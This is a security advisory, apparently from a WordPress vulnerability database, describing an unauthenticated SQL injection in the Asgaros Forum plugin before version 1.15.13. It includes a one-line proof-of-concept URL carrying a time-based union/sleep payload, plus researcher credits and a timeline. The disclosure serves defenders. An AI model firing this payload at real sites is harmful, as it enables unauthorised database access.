WordPress Plugin Vulnerabilities

Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection

Description

The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue

Proof of Concept

https://example.com/forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10)

Affects Plugins

Fixed in 1.15.13

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
Verified
Yes

Timeline

Publicly Published
2021-10-11 (about 2 years ago)
Added
2021-10-11 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other